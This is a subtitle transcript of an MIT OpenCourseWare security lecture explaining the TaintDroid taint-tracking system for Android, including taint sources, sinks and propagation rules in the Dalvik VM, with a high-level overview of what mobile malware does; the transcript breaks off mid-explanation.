1
00:00:00,080 --> 00:00:02,430
The following content is
provided under a Creative

2
00:00:02,430 --> 00:00:03,810
Commons license.

3
00:00:03,810 --> 00:00:06,050
Your support will help
MIT OpenCourseWare

4
00:00:06,050 --> 00:00:10,150
continue to offer high quality
educational resources for free.

5
00:00:10,150 --> 00:00:12,690
To make a donation or to
view additional materials

6
00:00:12,690 --> 00:00:16,600
from hundreds of MIT courses,
visit MIT OpenCourseWare

7
00:00:16,600 --> 00:00:17,310
at ocw.mit.edu.

8
00:00:25,732 --> 00:00:28,210
PROFESSOR: All right,
let's get started.

9
00:00:28,210 --> 00:00:29,820
Thank you for showing
up to this very

10
00:00:29,820 --> 00:00:32,619
special pre-Thanksgiving
lecture.

11
00:00:32,619 --> 00:00:35,570
I'm glad you guys have
such devotion to security,

12
00:00:35,570 --> 00:00:37,790
I'm sure that you will be
rewarded on the job market

13
00:00:37,790 --> 00:00:38,373
at some point.

14
00:00:38,373 --> 00:00:40,340
Feel free to list me
as a recommendation.

15
00:00:40,340 --> 00:00:42,877
So today we're going to
talk about taint tracking,

16
00:00:42,877 --> 00:00:45,210
and in particular we're going
to look at a system called

17
00:00:45,210 --> 00:00:47,950
TaintDroid that looks at how
to do this type of information

18
00:00:47,950 --> 00:00:51,930
flow analysis in the context
of Android smartphones.

19
00:00:51,930 --> 00:00:54,970
And so the basic problem
the paper deals with

20
00:00:54,970 --> 00:00:57,190
is this fact that apps
can exfiltrate data.

21
00:00:57,190 --> 00:00:58,940
So the basic idea
is that your phone

22
00:00:58,940 --> 00:01:01,670
contains a lot of sensitive
information, right.

23
00:01:01,670 --> 00:01:05,060
It contains your contacts
list and your phone number

24
00:01:05,060 --> 00:01:06,920
and your email and all
that kind of stuff.

25
00:01:06,920 --> 00:01:12,070
So if the operating system or
the phone itself isn't careful,

26
00:01:12,070 --> 00:01:14,550
then a malicious app
might be able to take

27
00:01:14,550 --> 00:01:17,030
some of that information
and send it back

28
00:01:17,030 --> 00:01:19,337
to its home server,
and that server

29
00:01:19,337 --> 00:01:21,170
can use it for all types
of nefarious things

30
00:01:21,170 --> 00:01:23,810
as we'll talk about later.

31
00:01:23,810 --> 00:01:29,900
The high-level solution that
the TaintDroid paper suggests

32
00:01:29,900 --> 00:01:35,320
is that we should basically
track the sensitive data as it

33
00:01:35,320 --> 00:01:37,940
flows through the system,
and essentially, we

34
00:01:37,940 --> 00:01:42,754
need to stop it from
going over the network.

35
00:01:42,754 --> 00:01:44,170
In other words,
we need to stop it

36
00:01:44,170 --> 00:01:50,380
from being passed as an argument
to networking system calls.

37
00:01:54,260 --> 00:01:56,400
And so presumably,
if we can do that,

38
00:01:56,400 --> 00:01:59,230
then we can essentially stop
the leak right at the moment

39
00:01:59,230 --> 00:02:00,940
that it's about to happen.

40
00:02:00,940 --> 00:02:02,660
So you might think
to yourself, so why

41
00:02:02,660 --> 00:02:05,470
are traditional
Android permissions

42
00:02:05,470 --> 00:02:09,770
insufficient to stop these
types of data exfiltrations?

43
00:02:09,770 --> 00:02:12,660
And the reason is that these
permissions don't really

44
00:02:12,660 --> 00:02:15,452
have the appropriate grammar to
talk about the type of attack

45
00:02:15,452 --> 00:02:16,660
that we're trying to prevent.

46
00:02:16,660 --> 00:02:18,493
So a lot of times these
Android permissions,

47
00:02:18,493 --> 00:02:21,400
they deal with these things
like can an application

48
00:02:21,400 --> 00:02:23,550
read or write to a
particular device.

49
00:02:23,550 --> 00:02:24,940
But we're talking
about something

50
00:02:24,940 --> 00:02:27,570
at a sort of different
level of semantics.

51
00:02:27,570 --> 00:02:30,620
We're saying even if an
application has been granted

52
00:02:30,620 --> 00:02:33,330
the authority to read or
write a particular device,

53
00:02:33,330 --> 00:02:35,830
like the network,
for example, it still

54
00:02:35,830 --> 00:02:40,100
might not be good to allow that
application to read or write

55
00:02:40,100 --> 00:02:43,000
certain sensitive data over
that device to which it

56
00:02:43,000 --> 00:02:44,890
has permissions.

57
00:02:44,890 --> 00:02:48,060
In other words, using these
traditional Android security

58
00:02:48,060 --> 00:02:49,690
policies, it is
difficult to speak

59
00:02:49,690 --> 00:02:51,997
about specific types of data.

60
00:02:51,997 --> 00:02:54,580
It's much easier to talk about
whether an application accesses

61
00:02:54,580 --> 00:02:55,620
a device or not.

62
00:02:55,620 --> 00:03:00,490
So you might think, all right,
so that's kind of a bummer,

63
00:03:00,490 --> 00:03:02,870
but maybe we can
solve this problem

64
00:03:02,870 --> 00:03:07,015
by-- we have this alternate
solution, so we'll

65
00:03:07,015 --> 00:03:08,600
call this solution star.

66
00:03:08,600 --> 00:03:11,410
So maybe we can
just never install

67
00:03:11,410 --> 00:03:21,410
applications that can do
reads of sensitive data

68
00:03:21,410 --> 00:03:24,690
and also have network access.

69
00:03:27,660 --> 00:03:29,890
At first glance, that
seems to solve the problem.

70
00:03:29,890 --> 00:03:31,430
Because if it can't do
both of these things,

71
00:03:31,430 --> 00:03:33,138
it either can't get
to the sensitive data

72
00:03:33,138 --> 00:03:35,879
in the first place, or it can,
but it can't send it anywhere.

73
00:03:35,879 --> 00:03:38,170
So does anyone have any ideas
why this probably isn't

74
00:03:38,170 --> 00:03:39,336
going to work out very well?

75
00:03:42,252 --> 00:03:43,960
Everyone's already
thinking about turkey.

76
00:03:43,960 --> 00:03:46,760
I can see in your eyes.

77
00:03:46,760 --> 00:03:50,500
The main reason why this
is probably a bad idea

78
00:03:50,500 --> 00:03:57,220
is that this is going to break a
lot of legitimate applications.

79
00:03:59,950 --> 00:04:02,234
So you could imagine that
there are a lot of programs,

80
00:04:02,234 --> 00:04:03,650
like maybe email
clients or things

81
00:04:03,650 --> 00:04:07,550
like that, that should actually
have the ability, perhaps,

82
00:04:07,550 --> 00:04:09,060
to read some data
that's sensitive

83
00:04:09,060 --> 00:04:12,044
and also send information
over the network.

84
00:04:12,044 --> 00:04:13,460
So if we just say
that we're going

85
00:04:13,460 --> 00:04:15,617
to prevent this sort of
"and" type of activity,

86
00:04:15,617 --> 00:04:17,700
then you're actually going
to make a lot of things

87
00:04:17,700 --> 00:04:20,019
that work right now fail.

88
00:04:20,019 --> 00:04:22,220
So users are not
going to like that.

89
00:04:22,220 --> 00:04:26,580
Another problem here is
that even if we did implement

90
00:04:26,580 --> 00:04:32,300
this solution, it's not going to
stop a bunch of different side

91
00:04:32,300 --> 00:04:35,890
channel mechanisms
for data leakage.

92
00:04:35,890 --> 00:04:37,930
So for example, we've
talked in previous classes

93
00:04:37,930 --> 00:04:40,750
about how the browser
cache, for example,

94
00:04:40,750 --> 00:04:43,900
can leak information about
whether a particular site has

95
00:04:43,900 --> 00:04:45,200
been visited or not.

96
00:04:45,200 --> 00:04:48,200
And so even if we have a
security policy like this,

97
00:04:48,200 --> 00:04:50,387
maybe we don't capture all
kinds of side channels.

98
00:04:50,387 --> 00:04:52,720
We'll talk about some other
side channels a little later

99
00:04:52,720 --> 00:04:54,870
in the lecture.

100
00:04:54,870 --> 00:05:01,250
Another thing that this
wouldn't stop is app collusion.

101
00:05:01,250 --> 00:05:05,040
So two apps can
actually collaborate

102
00:05:05,040 --> 00:05:07,220
to break the security system.

103
00:05:07,220 --> 00:05:10,400
So for example, what
if there's one app that

104
00:05:10,400 --> 00:05:12,060
doesn't have network
access, but it

105
00:05:12,060 --> 00:05:14,600
can talk to a second
application, which does.

106
00:05:14,600 --> 00:05:16,879
So maybe it can use
Android's IPC mechanisms

107
00:05:16,879 --> 00:05:18,920
to pass the sensitive data
to an application that

108
00:05:18,920 --> 00:05:21,170
does have network permissions,
and that second app can

109
00:05:21,170 --> 00:05:24,780
actually upload that
information to the server.

110
00:05:24,780 --> 00:05:27,920
And even if the apps
aren't colluding,

111
00:05:27,920 --> 00:05:31,540
then there may be
some type of trickery

112
00:05:31,540 --> 00:05:34,300
that an application
can engage in

113
00:05:34,300 --> 00:05:37,000
to trick some other applications
into accidentally revealing

114
00:05:37,000 --> 00:05:38,040
sensitive data.

115
00:05:38,040 --> 00:05:40,960
So maybe there's some type
of weakness in the way

116
00:05:40,960 --> 00:05:42,510
that the email
program is written,

117
00:05:42,510 --> 00:05:45,322
and so perhaps that
email program accepts

118
00:05:45,322 --> 00:05:47,280
too many random messages
from other things that

119
00:05:47,280 --> 00:05:48,340
are living on the system.

120
00:05:48,340 --> 00:05:50,850
So perhaps we could craft a
special intent that's somehow

121
00:05:50,850 --> 00:05:53,360
going to trick your Gmail
application, for example,

122
00:05:53,360 --> 00:05:57,409
into emailing something to
someone outside of the phone.

123
00:05:57,409 --> 00:05:59,950
At a high level, this approach
doesn't really work very well.

124
00:06:02,682 --> 00:06:04,390
One important thing
to think about is OK,

125
00:06:04,390 --> 00:06:06,681
so it seems like we're very
worried about the sensitive

126
00:06:06,681 --> 00:06:07,710
data leaving the phone.

127
00:06:07,710 --> 00:06:12,690
So what does Android malware
actually do in practice.

128
00:06:12,690 --> 00:06:16,364
Are there any kinds
of real world attacks

129
00:06:16,364 --> 00:06:18,030
that we're going to
be preventing by all

130
00:06:18,030 --> 00:06:19,950
this taint tracking type stuff.

131
00:06:19,950 --> 00:06:21,320
And the answer is yes.

132
00:06:21,320 --> 00:06:24,080
So increasingly, malware is
becoming a bigger problem

133
00:06:24,080 --> 00:06:25,080
for these mobile phones.

134
00:06:25,080 --> 00:06:31,020
So one thing it might do is
it might use your location

135
00:06:31,020 --> 00:06:37,325
or maybe your IMEI for ads.

136
00:06:40,227 --> 00:06:41,810
So similarly to
malware, it's actually

137
00:06:41,810 --> 00:06:44,060
going to look and see where
you are physically located

138
00:06:44,060 --> 00:06:46,970
in the world and then maybe
it will say that, oh, you're

139
00:06:46,970 --> 00:06:48,720
located near the MIT
campus, therefore you

140
00:06:48,720 --> 00:06:50,190
must be a hungry student
so hey, why don't you

141
00:06:50,190 --> 00:06:52,356
go to my food truck that
happens to be located right

142
00:06:52,356 --> 00:06:54,130
where you are.

143
00:06:54,130 --> 00:06:57,282
IMEI is kind of
like this-- you can

144
00:06:57,282 --> 00:07:00,410
think of it as an integer that's
like a per-device unique identifier.

145
00:07:00,410 --> 00:07:02,924
So this could be used perhaps
to track you in ways that you

146
00:07:02,924 --> 00:07:04,965
don't want to be tracked,
in different locations,

147
00:07:04,965 --> 00:07:05,757
so on and so forth.

148
00:07:05,757 --> 00:07:07,381
So there's actually
malware in the wild

149
00:07:07,381 --> 00:07:08,840
that does things like that.

150
00:07:08,840 --> 00:07:11,080
Another thing that
malware might try to do

151
00:07:11,080 --> 00:07:13,040
is steal your credentials.

152
00:07:17,250 --> 00:07:22,850
So for example, it might try
to take your phone number,

153
00:07:22,850 --> 00:07:24,880
or it might try to
take your contact list,

154
00:07:24,880 --> 00:07:27,680
it might try to upload those
things to a remote server.

155
00:07:27,680 --> 00:07:30,690
Maybe that's useful for
trying to impersonate you,

156
00:07:30,690 --> 00:07:33,690
for example, in a
message that's going

157
00:07:33,690 --> 00:07:35,790
to be used for spam later on.

158
00:07:35,790 --> 00:07:39,990
There's malware out there that
does things like this today.

159
00:07:39,990 --> 00:07:44,290
Perhaps most horrifyingly,
at least for me,

160
00:07:44,290 --> 00:07:49,891
malware might be able to
turn your phone into a bot.

161
00:07:49,891 --> 00:07:52,140
This, of course, is a problem
that our parents did not

162
00:07:52,140 --> 00:07:53,120
have to deal with.

163
00:07:53,120 --> 00:07:55,380
Modern phones are so powerful
that they can actually

164
00:07:55,380 --> 00:07:57,845
be used to send out spam
messages themselves.

165
00:07:57,845 --> 00:08:00,230
So there's actually
a pretty nasty piece

166
00:08:00,230 --> 00:08:01,900
of malware that's
going around right now

167
00:08:01,900 --> 00:08:03,810
that seems to be targeting some
corporate environments that's

168
00:08:03,810 --> 00:08:04,710
doing precisely this.

169
00:08:04,710 --> 00:08:07,168
So it gets to your phone and
just starts sending out stuff.

170
00:08:07,168 --> 00:08:09,160
AUDIENCE: So this
type of malware,

171
00:08:09,160 --> 00:08:12,397
is it malware that subverts
the Android OS, or is it

172
00:08:12,397 --> 00:08:13,642
just a typical app?

173
00:08:13,642 --> 00:08:16,630
If it's a typical app, it
seems that it should be able--

174
00:08:16,630 --> 00:08:18,810
PROFESSOR: Yeah.

175
00:08:18,810 --> 00:08:20,720
That's a good question.

176
00:08:20,720 --> 00:08:22,720
There's both types
of malware out there.

177
00:08:22,720 --> 00:08:24,990
As it turns out, it's
actually fairly easy

178
00:08:24,990 --> 00:08:28,620
to get users to click on things.

179
00:08:28,620 --> 00:08:29,790
So I'll give you an example.

180
00:08:29,790 --> 00:08:31,290
This isn't necessarily
indicative of malware,

181
00:08:31,290 --> 00:08:32,832
more about the sad
state of humanity.

182
00:08:32,832 --> 00:08:34,373
There'll be a popular
game out there,

183
00:08:34,373 --> 00:08:35,832
let's say Angry
Birds, for example.

184
00:08:35,832 --> 00:08:37,997
You go to the App Store and
you type in Angry Birds,

185
00:08:37,997 --> 00:08:39,110
I want to get Angry Birds.

186
00:08:39,110 --> 00:08:40,880
So hopefully the
first hit that you get

187
00:08:40,880 --> 00:08:42,530
is the actual Angry Birds.

188
00:08:42,530 --> 00:08:46,160
But then the second hit will
be something like Angry Birdss,

189
00:08:46,160 --> 00:08:47,374
with two S's, for example.

190
00:08:47,374 --> 00:08:48,790
And a lot of people
will go there,

191
00:08:48,790 --> 00:08:50,789
and maybe it's cheaper
than the regular version,

192
00:08:50,789 --> 00:08:51,649
and they go there.

193
00:08:51,649 --> 00:08:53,440
It's going to present
that thing that says,

194
00:08:53,440 --> 00:08:55,450
do you allow this application
to do this, this, and this.

195
00:08:55,450 --> 00:08:57,275
The person is going to say, yeah,
because I got to get my Angry

196
00:08:57,275 --> 00:08:58,190
Birds, yeah, sure.

197
00:08:58,190 --> 00:09:00,280
Boom, then that
person could be owned.

198
00:09:00,280 --> 00:09:01,910
So in practice you
see malware that

199
00:09:01,910 --> 00:09:03,520
exploits both types of vectors.

200
00:09:03,520 --> 00:09:06,800
But you're exactly right that
if you assume that the Android

201
00:09:06,800 --> 00:09:09,950
security model is correct,
then the malware sort of

202
00:09:09,950 --> 00:09:13,760
has to depend on users
being foolish or naive

203
00:09:13,760 --> 00:09:15,869
and giving it network
access, for example,

204
00:09:15,869 --> 00:09:17,660
when your tic-tac-toe
game shouldn't really

205
00:09:17,660 --> 00:09:18,530
have network access.

206
00:09:21,814 --> 00:09:23,480
Yes, so you can
actually have your phone

207
00:09:23,480 --> 00:09:24,470
get turned into a bot.

208
00:09:24,470 --> 00:09:25,860
This is horrible for
multiple reasons,

209
00:09:25,860 --> 00:09:27,360
not only because
your phone is a bot

210
00:09:27,360 --> 00:09:28,930
but also because
maybe you're paying

211
00:09:28,930 --> 00:09:30,612
for data for all
those emails that are

212
00:09:30,612 --> 00:09:31,820
getting sent from your phone.

213
00:09:31,820 --> 00:09:33,640
Maybe your battery's
getting ground down

214
00:09:33,640 --> 00:09:36,610
because your phone's just
sitting around constantly

215
00:09:36,610 --> 00:09:41,740
sending ads about whatever, free
trips to Bermuda or whatever.

216
00:09:41,740 --> 00:09:45,170
There are actually malicious
applications out there

217
00:09:45,170 --> 00:09:48,975
that will use your private
information for bad.

218
00:09:48,975 --> 00:09:50,850
And the particularly
bad thing about this bot

219
00:09:50,850 --> 00:09:52,891
here is that it can actually
look at your contact

220
00:09:52,891 --> 00:09:54,380
list and send spam
on your behalf

221
00:09:54,380 --> 00:09:57,130
to people that you know and make
the likelihood of the victim

222
00:09:57,130 --> 00:09:59,380
clicking on something in
that email much, much higher.

223
00:10:01,511 --> 00:10:03,510
One thing to note, and
this is kind of getting back

224
00:10:03,510 --> 00:10:04,660
to the discussion
we just had, so

225
00:10:04,660 --> 00:10:06,034
preventing this
data exfiltration

226
00:10:06,034 --> 00:10:07,240
is very nice, right.

227
00:10:07,240 --> 00:10:09,440
But in and of itself,
preventing that exfiltration

228
00:10:09,440 --> 00:10:11,512
doesn't stop the hack
in the first place.

229
00:10:11,512 --> 00:10:13,470
So there's actually
mechanisms that we actually

230
00:10:13,470 --> 00:10:15,910
should look at to prevent your
machine from getting owned

231
00:10:15,910 --> 00:10:18,249
in the first place or to
educate users about what they

232
00:10:18,249 --> 00:10:19,540
should and should not click on.

233
00:10:19,540 --> 00:10:20,914
So just doing this
taint tracking

234
00:10:20,914 --> 00:10:23,124
isn't a full solution for
preventing your machine

235
00:10:23,124 --> 00:10:24,165
from getting compromised.

236
00:10:26,910 --> 00:10:33,240
How is TaintDroid in
particular going to work?

237
00:10:33,240 --> 00:10:35,520
Let's see.

238
00:10:35,520 --> 00:10:38,460
So as I mentioned
before, TaintDroid

239
00:10:38,460 --> 00:10:43,760
is going to track all of
your sensitive information

240
00:10:43,760 --> 00:10:45,520
as it propagates
through the system.

241
00:10:45,520 --> 00:10:48,340
So TaintDroid
distinguishes between what

242
00:10:48,340 --> 00:10:51,140
they call information sources
and information sinks.

243
00:10:51,140 --> 00:10:58,240
So these sources are things
that generate sensitive data.

244
00:10:58,240 --> 00:11:02,520
So you might think of this
as things like sensors.

245
00:11:02,520 --> 00:11:05,310
So for example,
GPS, accelerometer,

246
00:11:05,310 --> 00:11:06,780
things like that.

247
00:11:06,780 --> 00:11:12,600
This could be your
contact list database,

248
00:11:12,600 --> 00:11:20,520
this could be things like the
IMEI, basically anything that

249
00:11:20,520 --> 00:11:24,000
might help to tie you,
a particular user,

250
00:11:24,000 --> 00:11:25,250
to your actual phone.

251
00:11:25,250 --> 00:11:28,220
So these are the things
that generate the taint.

252
00:11:28,220 --> 00:11:31,280
And then you can
think of these sinks

253
00:11:31,280 --> 00:11:36,170
as being the places where we
don't want tainted data to go.

254
00:11:36,170 --> 00:11:38,150
And so in the case
of TaintDroid,

255
00:11:38,150 --> 00:11:41,530
the particular sink that we're
concerned about is the network.

256
00:11:44,090 --> 00:11:47,690
As we'll talk about later, you
can generalize information flow

257
00:11:47,690 --> 00:11:49,990
to more scenarios than
TaintDroid specifically covers.

258
00:11:49,990 --> 00:11:52,281
So you can imagine there
might be other sinks in a more

259
00:11:52,281 --> 00:11:53,430
general purpose system.

260
00:11:53,430 --> 00:11:54,971
But for TaintDroid,
they're literally

261
00:11:54,971 --> 00:11:59,180
caring about the network as
the sink for information.

262
00:11:59,180 --> 00:12:08,550
So in TaintDroid, they're
going to use a 32-bit bitvector

263
00:12:08,550 --> 00:12:12,300
to represent taint.

264
00:12:12,300 --> 00:12:15,590
And so what this basically
means is that you can have,

265
00:12:15,590 --> 00:12:20,140
at most, 32 distinct
taint sources.

266
00:12:20,140 --> 00:12:22,510
So each sensitive
data value will

267
00:12:22,510 --> 00:12:24,204
have a one in a
particular position

268
00:12:24,204 --> 00:12:26,620
if it has been tainted by some
particular source of taint.

269
00:12:26,620 --> 00:12:31,370
That's like, has it been
derived from your GPS data,

270
00:12:31,370 --> 00:12:32,140
for example.

271
00:12:32,140 --> 00:12:34,370
Has it been derived from
something from your contacts

272
00:12:34,370 --> 00:12:37,540
list, and so on and so forth.

273
00:12:37,540 --> 00:12:41,680
One interesting thing is
that 32 sources of taint

274
00:12:41,680 --> 00:12:44,120
is actually not that big, right.

275
00:12:44,120 --> 00:12:47,960
And so an interesting
question is,

276
00:12:47,960 --> 00:12:49,900
is that big enough for
this particular system

277
00:12:49,900 --> 00:12:52,108
and is it big enough in
general for these information

278
00:12:52,108 --> 00:12:53,430
flow systems.

279
00:12:53,430 --> 00:12:55,860
So in the particular
case of TaintDroid,

280
00:12:55,860 --> 00:12:58,160
32 possible sources
of taint seems

281
00:12:58,160 --> 00:13:01,160
to be somewhat reasonable,
because it's actually

282
00:13:01,160 --> 00:13:04,360
looking at a fairly constrained
information flow problem.

283
00:13:04,360 --> 00:13:07,230
So it's saying given all the
sensors you have on your phone,

284
00:13:07,230 --> 00:13:09,400
given all of these
sensitive databases,

285
00:13:09,400 --> 00:13:12,000
and things like that,
32 seems roughly

286
00:13:12,000 --> 00:13:15,250
the right order of
magnitude in terms

287
00:13:15,250 --> 00:13:18,170
of storing these taint flags.

288
00:13:18,170 --> 00:13:21,100
And as we'll see in the
implementation of this system,

289
00:13:21,100 --> 00:13:22,600
32 is actually very
convenient, too,

290
00:13:22,600 --> 00:13:24,390
because what else is 32 bits?

291
00:13:24,390 --> 00:13:25,590
Well, an integer.

292
00:13:25,590 --> 00:13:28,006
So you can actually do some
very efficient representations

293
00:13:28,006 --> 00:13:30,650
of these taint flags in the way
that they actually build this.

294
00:13:30,650 --> 00:13:32,150
As we'll discuss a
little bit later,

295
00:13:32,150 --> 00:13:36,090
though, if you want to expose
information flow to programmers

296
00:13:36,090 --> 00:13:38,310
in a more generic
way, so for example,

297
00:13:38,310 --> 00:13:40,440
if you want programmers
to be able to specify

298
00:13:40,440 --> 00:13:44,080
their own sources of taint
and their own types of sink,

299
00:13:44,080 --> 00:13:46,660
then 32 bits probably
isn't enough.

300
00:13:46,660 --> 00:13:48,060
In systems like
that you actually

301
00:13:48,060 --> 00:13:51,790
have to think about including
more complex runtime support

302
00:13:51,790 --> 00:13:54,960
for a larger label space.

303
00:13:54,960 --> 00:13:57,720
So does that all make sense?

304
00:13:57,720 --> 00:14:02,830
OK so roughly speaking,
when you look at the way

305
00:14:02,830 --> 00:14:06,370
that a taint flows through
the system, at a high level,

306
00:14:06,370 --> 00:14:09,750
it basically goes from the
right hand side of a statement

307
00:14:09,750 --> 00:14:11,160
to the left hand side.

308
00:14:11,160 --> 00:14:16,060
So as a very simple example,
if you had some statement,

309
00:14:16,060 --> 00:14:19,180
like you declare an integer
variable that's going to get

310
00:14:19,180 --> 00:14:27,520
your latitude, and then at a high
level you call gps.getLat(),

311
00:14:27,520 --> 00:14:31,770
then essentially this thing here
is going to generate a value

312
00:14:31,770 --> 00:14:33,972
that has some taint
that's associated with it.

313
00:14:33,972 --> 00:14:35,930
Some particular flag will
be set that indicates

314
00:14:35,930 --> 00:14:38,400
that hey, this
value I'm returning

315
00:14:38,400 --> 00:14:39,650
comes from a sensitive source.

316
00:14:39,650 --> 00:14:41,941
So the taint will come from
here on the right hand side

317
00:14:41,941 --> 00:14:43,600
and go over here to
the left hand side,

318
00:14:43,600 --> 00:14:45,840
and now that is
actually tainted.

319
00:14:45,840 --> 00:14:49,210
So that's sort of what it
looks like from the perspective

320
00:14:49,210 --> 00:14:52,080
of the human developer
who writes source code.

321
00:14:52,080 --> 00:14:56,284
However, the Dalvik VM actually
uses this register-based format

322
00:14:56,284 --> 00:14:58,200
at the lower level to
actually build programs,

323
00:14:58,200 --> 00:15:00,770
and that's actually the way
that these taint semantics

324
00:15:00,770 --> 00:15:03,864
are implemented in reality.

325
00:15:03,864 --> 00:15:06,030
This is what's explained
in Table 1 of the paper,

326
00:15:06,030 --> 00:15:09,345
so they have this big list
of classes of opcodes,

327
00:15:09,345 --> 00:15:11,720
and they describe how
taint sort of flows

328
00:15:11,720 --> 00:15:12,880
for those types of opcodes.

329
00:15:12,880 --> 00:15:14,950
So for example,
you might imagine

330
00:15:14,950 --> 00:15:20,060
that you have an operation
that looks kind of like a move,

331
00:15:20,060 --> 00:15:24,990
and so it mentions a
destination and a source.

332
00:15:24,990 --> 00:15:28,334
So Dalvik is a
register-based virtual machine,

333
00:15:28,334 --> 00:15:29,750
so you can think
of these as being

334
00:15:29,750 --> 00:15:33,450
registers on this sort of
abstract computation engine.

335
00:15:33,450 --> 00:15:36,990
And so essentially what happens
here is that, like I said,

336
00:15:36,990 --> 00:15:39,557
taint goes from the right hand
side to the left hand side.

337
00:15:39,557 --> 00:15:41,390
So in this case, when
the Dalvik interpreter

338
00:15:41,390 --> 00:15:43,190
executes this
instruction here, it's

339
00:15:43,190 --> 00:15:45,830
going to look at the
taint label, this,

340
00:15:45,830 --> 00:15:48,050
and it's going to
assign it over here.

341
00:15:50,714 --> 00:15:53,130
Then you might imagine you
have another instruction that's

342
00:15:53,130 --> 00:15:55,110
like a binary operation.

343
00:15:55,110 --> 00:15:59,300
So think of this as something
like addition, for example.

344
00:15:59,300 --> 00:16:01,480
So here you'll have
a single destination,

345
00:16:01,480 --> 00:16:07,350
but then you'll
have two sources.

346
00:16:07,350 --> 00:16:09,000
And what will
happen in this case

347
00:16:09,000 --> 00:16:12,120
is that when the Dalvik interpreter
encounters this instruction,

348
00:16:12,120 --> 00:16:14,040
it'll take the taints
of both of these,

349
00:16:14,040 --> 00:16:18,960
construct a union of those,
and then assign that union

350
00:16:18,960 --> 00:16:22,049
to be the taint tag over here.

351
00:16:22,049 --> 00:16:23,090
Does that all make sense?

352
00:16:23,090 --> 00:16:24,470
It's fairly straightforward.

353
00:16:24,470 --> 00:16:28,250
So the table breaks down all the
different types of instructions

354
00:16:28,250 --> 00:16:30,952
that you'll see, but to
a first approximation,

355
00:16:30,952 --> 00:16:32,660
these are the most
common ways that taint

356
00:16:32,660 --> 00:16:34,500
propagates through the system.

357
00:16:34,500 --> 00:16:37,350
Now there are actually some
interesting special cases

358
00:16:37,350 --> 00:16:39,240
that they mention in the paper.

359
00:16:39,240 --> 00:16:46,680
So one of those special
cases involves arrays.

360
00:16:46,680 --> 00:16:49,130
Let's say that you
have some code that's

361
00:16:49,130 --> 00:16:53,470
going to declare a
character, and you

362
00:16:53,470 --> 00:16:56,480
get the value for the character
somehow, doesn't really matter.

363
00:16:56,480 --> 00:17:02,380
And then let's say the
program declares some array,

364
00:17:02,380 --> 00:17:04,609
we'll call it upper[].

365
00:17:04,609 --> 00:17:15,020
And it's basically going to have
uppercase versions of letters.

366
00:17:15,020 --> 00:17:16,980
And so one very common
thing to do in code

367
00:17:16,980 --> 00:17:20,690
is to index into an array like
this using, for example, maybe

368
00:17:20,690 --> 00:17:22,580
just c directly,
because as we all know,

369
00:17:22,580 --> 00:17:25,079
Kernighan and Ritchie teach us
that basically characters are

370
00:17:25,079 --> 00:17:26,710
integers, so hooray for that.

371
00:17:26,710 --> 00:17:29,670
So you can imagine that
you have some code that

372
00:17:29,670 --> 00:17:33,960
says something like the upper
case version of this character

373
00:17:33,960 --> 00:17:38,080
here is going to be whatever
is at a particular index

374
00:17:38,080 --> 00:17:43,400
in this table here, and we
index that table by c like this.

375
00:17:43,400 --> 00:17:48,780
So there's a question of what
taint should this receive.

376
00:17:48,780 --> 00:17:50,280
It seems pretty
straightforward what

377
00:17:50,280 --> 00:17:52,930
should happen in these
cases, but in this case,

378
00:17:52,930 --> 00:17:55,352
it seems like we have multiple
things that are going on.

379
00:17:55,352 --> 00:17:57,810
We've got this array here that
may have some type of taint,

380
00:17:57,810 --> 00:17:59,476
we've got this character
c here that may

381
00:17:59,476 --> 00:18:01,500
have some type of taint.

382
00:18:01,500 --> 00:18:04,350
What Dalvik decides
to do in this case

383
00:18:04,350 --> 00:18:05,835
is a little bit
similar to what it

384
00:18:05,835 --> 00:18:08,000
does in the case of
this binary op here.

385
00:18:08,000 --> 00:18:11,450
So it's essentially going to say
that this character over here

386
00:18:11,450 --> 00:18:15,500
is going to get the union
of the taint of c and also

387
00:18:15,500 --> 00:18:16,800
of the array.

388
00:18:16,800 --> 00:18:19,930
And the intuition behind
that is that to generate

389
00:18:19,930 --> 00:18:23,000
this character, we somehow
had to know something

390
00:18:23,000 --> 00:18:24,320
about this array here.

391
00:18:24,320 --> 00:18:26,702
We had to know something
about this index here.

392
00:18:26,702 --> 00:18:28,160
So therefore I
guess it makes sense

393
00:18:28,160 --> 00:18:30,789
that this thing should
be as sensitive as both

394
00:18:30,789 --> 00:18:31,830
of these things combined.

395
00:18:35,580 --> 00:18:38,220
AUDIENCE: Can you explain
again move op and binary

396
00:18:38,220 --> 00:18:40,860
op, what exactly it means,
like the union of a taint.

397
00:18:40,860 --> 00:18:48,320
PROFESSOR: Yes, so
imagine that-- let's look

398
00:18:48,320 --> 00:18:49,800
at the move op here.

399
00:18:49,800 --> 00:18:53,030
So imagine that this
source operation here just

400
00:18:53,030 --> 00:18:56,050
had-- actually, let
me get more concrete.

401
00:18:56,050 --> 00:18:57,760
So each variable,
as I'll describe

402
00:18:57,760 --> 00:19:00,610
in a second what a variable is,
has this integer, essentially,

403
00:19:00,610 --> 00:19:02,460
that has a bunch of
bits that are set

404
00:19:02,460 --> 00:19:04,550
according to what taint it has.

405
00:19:04,550 --> 00:19:06,760
So imagine each one of
these values flying around

406
00:19:06,760 --> 00:19:08,270
has this associated
integer flying

407
00:19:08,270 --> 00:19:09,740
around that has some bits set.

408
00:19:09,740 --> 00:19:14,415
So let's say that this source
had two bits set, corresponding

409
00:19:14,415 --> 00:19:16,540
to the fact that it had
been tainted by two things,

410
00:19:16,540 --> 00:19:17,510
it doesn't really matter.

411
00:19:17,510 --> 00:19:20,093
So what the interpreter will do
is it will look at this source

412
00:19:20,093 --> 00:19:22,560
thing, it'll look at
the associated integer,

413
00:19:22,560 --> 00:19:24,550
and it'll say aha.

414
00:19:24,550 --> 00:19:27,410
I should take that integer
that has those two bits set

415
00:19:27,410 --> 00:19:33,775
and then essentially make that
integer the taint tag for this.

416
00:19:33,775 --> 00:19:35,400
So that's sort of a
simple case, right.

417
00:19:35,400 --> 00:19:37,160
The more complicated case,
like what does the union

418
00:19:37,160 --> 00:19:38,060
actually look like.

419
00:19:38,060 --> 00:19:44,480
So imagine that we've
got these two things here

420
00:19:44,480 --> 00:19:48,524
and we've got
source 0, source 1.

421
00:19:48,524 --> 00:19:49,940
And so I'm going
to show you here,

422
00:19:49,940 --> 00:19:53,719
these are the tainted
bits for this particular--

423
00:19:53,719 --> 00:19:54,635
AUDIENCE: [INAUDIBLE]?

424
00:19:54,635 --> 00:19:58,819
PROFESSOR: Yeah, so
imagine that you have

425
00:19:58,819 --> 00:20:00,110
this is the taint for this one.

426
00:20:00,110 --> 00:20:03,650
And imagine that the taint
for this one is this.

427
00:20:03,650 --> 00:20:07,030
So what's the taint going
to look like for dest?

428
